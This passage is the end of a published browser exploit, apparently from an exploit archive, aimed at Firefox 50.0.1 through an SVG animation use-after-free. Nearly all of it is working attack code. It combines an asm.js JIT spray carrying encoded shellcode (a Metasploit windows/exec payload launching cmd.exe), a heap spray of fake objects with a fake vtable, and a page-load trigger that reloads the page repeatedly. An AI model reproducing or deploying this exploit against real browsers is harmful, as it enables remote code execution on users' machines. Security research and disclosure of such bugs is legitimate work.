0xa85169b5)|0;\r\n val = (val + 0xa890eb89)|0;\r\n val = (val + 0xa83cc583)|0;\r\n val = (val + 0xa8006d8b)|0;\r\n val = (val + 0xa890dd01)|0;\r\n val = (val + 0xa878c583)|0;\r\n val = (val + 0xa8006d8b)|0;\r\n val = (val + 0xa890dd01)|0;\r\n val = (val + 0xa820458b)|0;\r\n val = (val + 0xa890d801)|0;\r\n val = (val + 0xa890d231)|0;\r\n val = (val + 0xa890e789)|0;\r\n val = (val + 0xa8590d6a)|0;\r\n val = (val + 0xa810348b)|0;\r\n val = (val + 0xa890de01)|0;\r\n val = (val + 0xa890a6f3)|0;\r\n val = (val + 0xa8900de3)|0;\r\n val = (val + 0xa804c283)|0;\r\n val = (val + 0xa890dbeb)|0;\r\n val = (val + 0xa8247d8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa890ead1)|0;\r\n val = (val + 0xa890d701)|0;\r\n val = (val + 0xa890d231)|0;\r\n val = (val + 0xa8178b66)|0;\r\n val = (val + 0xa81c7d8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa802e2c1)|0;\r\n val = (val + 0xa890d701)|0;\r\n val = (val + 0xa8903f8b)|0;\r\n val = (val + 0xa890df01)|0;\r\n val = (val + 0xa890406a)|0;\r\n val = (val + 0xa890c031)|0;\r\n val = (val + 0xa85030b4)|0;\r\n val = (val + 0xa85010b4)|0;\r\n val = (val + 0xa890006a)|0;\r\n val = (val + 0xa890d7ff)|0;\r\n val = (val + 0xa890c931)|0;\r\n val = (val + 0xa89000b5)|0;\r\n val = (val + 0xa890c3b1)|0;\r\n val = (val + 0xa890ebd9)|0;\r\n val = (val + 0xa82434d9)|0;\r\n val = (val + 0xa890e689)|0;\r\n val = (val + 0xa80cc683)|0;\r\n val = (val + 0xa890368b)|0;\r\n val = (val + 0xa85fc683)|0;\r\n val = (val + 0xa890c789)|0;\r\n val = (val + 0xa81e8b66)|0;\r\n val = (val + 0xa81f8966)|0;\r\n val = (val + 0xa802c683)|0;\r\n val = (val + 0xa802c783)|0;\r\n val = (val + 0xa8901e8a)|0;\r\n val = (val + 0xa8901f88)|0;\r\n val = (val + 0xa803c683)|0;\r\n val = (val + 0xa801c783)|0;\r\n val = (val + 0xa803e983)|0;\r\n val = (val + 0xa89008e3)|0;\r\n val = (val + 0xa890cceb)|0;\r\n val = (val + 0xa890e0ff)|0;\r\n val = (val + 0xa824248d)|0;\r\n /* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */\r\n val = (val + 0xa882e8fc)|0;\r\n val = (val + 0xa8000000)|0;\r\n val = (val + 0xa8e58960)|0;\r\n val = (val + 0xa864c031)|0;\r\n val = (val + 0xa830508b)|0;\r\n val = (val + 0xa80c528b)|0;\r\n val = (val + 0xa814528b)|0;\r\n val = (val + 0xa828728b)|0;\r\n val = (val + 0xa84ab70f)|0;\r\n val = (val + 0xa8ff3126)|0;\r\n val = (val + 0xa8613cac)|0;\r\n val = (val + 0xa82c027c)|0;\r\n val = (val + 0xa8cfc120)|0;\r\n val = (val + 0xa8c7010d)|0;\r\n val = (val + 0xa852f2e2)|0;\r\n val = (val + 0xa8528b57)|0;\r\n val = (val + 0xa84a8b10)|0;\r\n val = (val + 0xa84c8b3c)|0;\r\n val = (val + 0xa8e37811)|0;\r\n val = (val + 0xa8d10148)|0;\r\n val = (val + 0xa8598b51)|0;\r\n val = (val + 0xa8d30120)|0;\r\n val = (val + 0xa818498b)|0;\r\n val = (val + 0xa8493ae3)|0;\r\n val = (val + 0xa88b348b)|0;\r\n val = (val + 0xa831d601)|0;\r\n val = (val + 0xa8c1acff)|0;\r\n val = (val + 0xa8010dcf)|0;\r\n val = (val + 0xa8e038c7)|0;\r\n val = (val + 0xa803f675)|0;\r\n val = (val + 0xa83bf87d)|0;\r\n val = (val + 0xa875247d)|0;\r\n val = (val + 0xa88b58e4)|0;\r\n val = (val + 0xa8012458)|0;\r\n val = (val + 0xa88b66d3)|0;\r\n val = (val + 0xa88b4b0c)|0;\r\n val = (val + 0xa8011c58)|0;\r\n val = (val + 0xa8048bd3)|0;\r\n val = (val + 0xa8d0018b)|0;\r\n val = (val + 0xa8244489)|0;\r\n val = (val + 0xa85b5b24)|0;\r\n val = (val + 0xa85a5961)|0;\r\n val = (val + 0xa8e0ff51)|0;\r\n val = (val + 0xa85a5f5f)|0;\r\n val = (val + 0xa8eb128b)|0;\r\n val = (val + 0xa86a5d8d)|0;\r\n val = (val + 0xa8858d01)|0;\r\n val = (val + 0xa80000b2)|0;\r\n val = (val + 0xa8685000)|0;\r\n val = (val + 0xa86f8b31)|0;\r\n val = (val + 0xa8d5ff87)|0;\r\n val = (val + 0xa80efebb)|0;\r\n val = (val + 0xa868ea32)|0;\r\n val = (val + 0xa8bd95a6)|0;\r\n val = (val + 0xa8d5ff9d)|0;\r\n val = (val + 0xa87c063c)|0;\r\n val = (val + 0xa8fb800a)|0;\r\n val = (val + 0xa80575e0)|0;\r\n val = (val + 0xa81347bb)|0;\r\n val = (val + 0xa86a6f72)|0;\r\n val = (val + 0xa8ff5300)|0;\r\n val = (val + 0xa86d63d5)|0;\r\n val = (val + 0xa8652e64)|0;\r\n val = (val + 0xa8006578)|0;\r\n val = (val + 0xa8909090)|0;\r\n \r\n return val|0;\r\n }\r\n return payload_code \r\n}\r\n</script>\r\n \r\n<script>\r\nfunction spray_asm_js_modules(){\r\n sprayed = []\r\n for (var i=0; i<= 0x1800; i++){\r\n sprayed[i] = asm_js_module()\r\n }\r\n}\r\n \r\n/* heap spray inspired by skylined */\r\nfunction heap_spray_fake_objects(){\r\n var heap = []\r\n var current_address = 0x08000000\r\n var block_size = 0x1000000\r\n while(current_address < object_target_address){\r\n var heap_block = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n \r\n /* fake object target = ecx + 0x88 and fake vtable*/\r\n heap_block[offset/4 + 0x00/4] = object_target_address\r\n /* self + 4 */\r\n heap_block[offset/4 + 0x14/4] = object_target_address\r\n /* the path to EIP */\r\n heap_block[offset/4 + 0x18/4] = 4\r\n heap_block[offset/4 + 0xac/4] = 1\r\n /* fake virtual function --> JIT target */\r\n heap_block[offset/4 + 0x138/4] = jit_payload_target \r\n }\r\n heap.push(heap_block)\r\n current_address += block_size\r\n }\r\n return heap\r\n}\r\n \r\n/* address of fake object */\r\nobject_target_address = 0x30300000\r\n \r\n/* address of our jitted shellcode */\r\njit_payload_target = 0x1c1c0054\r\n \r\n/* ASM.JS JIT Spray */\r\nspray_asm_js_modules()\r\n \r\n/* Spray fake objects */\r\nheap = heap_spray_fake_objects()\r\n \r\n/* -----> */\r\n/* bug trigger ripped from bugzilla report */\r\nvar worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage(\"one\");postMessage(\"two\");};');\r\nworker.postMessage(\"zero\");\r\nvar svgns = 'http://www.w3.org/2000/svg';\r\nvar heap80 = new Array(0x1000);\r\nvar heap100 = new Array(0x4000);\r\nvar block80 = new ArrayBuffer(0x80);\r\nvar block100 = new ArrayBuffer(0x100);\r\nvar sprayBase = undefined;\r\nvar arrBase = undefined;\r\nvar animateX = undefined;\r\nvar containerA = undefined;\r\nvar offset = 0x88 // Firefox 50.0.1\r\n \r\nvar exploit = function(){\r\n var u32 = new Uint32Array(block80)\r\n \r\n u32[0x4] = arrBase - offset;\r\n u32[0xa] = arrBase - offset;\r\n u32[0x10] = arrBase - offset;\r\n \r\n for(i = heap100.length/2; i < heap100.length; i++)\r\n {\r\n heap100[i] = block100.slice(0)\r\n }\r\n \r\n for(i = 0; i < heap80.length/2; i++)\r\n {\r\n heap80[i] = block80.slice(0)\r\n }\r\n \r\n animateX.setAttribute('begin', '59s')\r\n animateX.setAttribute('begin', '58s')\r\n \r\n for(i = heap80.length/2; i < heap80.length; i++)\r\n {\r\n heap80[i] = block80.slice(0)\r\n }\r\n \r\n for(i = heap100.length/2; i < heap100.length; i++)\r\n {\r\n heap100[i] = block100.slice(0)\r\n }\r\n \r\n animateX.setAttribute('begin', '10s')\r\n animateX.setAttribute('begin', '9s')\r\n containerA.pauseAnimations();\r\n}\r\n \r\nworker.onmessage = function(e) {arrBase=object_target_address; exploit()}\r\n//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}\r\n \r\nvar trigger = function(){\r\n containerA = document.createElementNS(svgns, 'svg')\r\n var containerB = document.createElementNS(svgns, 'svg');\r\n animateX = document.createElementNS(svgns, 'animate')\r\n var animateA = document.createElementNS(svgns, 'animate')\r\n var animateB = document.createElementNS(svgns, 'animate')\r\n var animateC = document.createElementNS(svgns, 'animate')\r\n var idA = \"ia\";\r\n var idC = \"ic\";\r\n animateA.setAttribute('id', idA);\r\n animateA.setAttribute('end', '50s');\r\n animateB.setAttribute('begin', '60s');\r\n animateB.setAttribute('end', idC + '.end');\r\n animateC.setAttribute('id', idC);\r\n animateC.setAttribute('end', idA + '.end');\r\n containerA.appendChild(animateX)\r\n containerA.appendChild(animateA)\r\n containerA.appendChild(animateB)\r\n containerB.appendChild(animateC)\r\n document.body.appendChild(containerA);\r\n document.body.appendChild(containerB);\r\n}\r\n \r\nwindow.onload = trigger;\r\nsetInterval(\"window.location.reload()\", 3000)\r\n/* <----- */\r\n \r\n</script>\n\n# 0day.today [2018-04-07] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28138"}]}
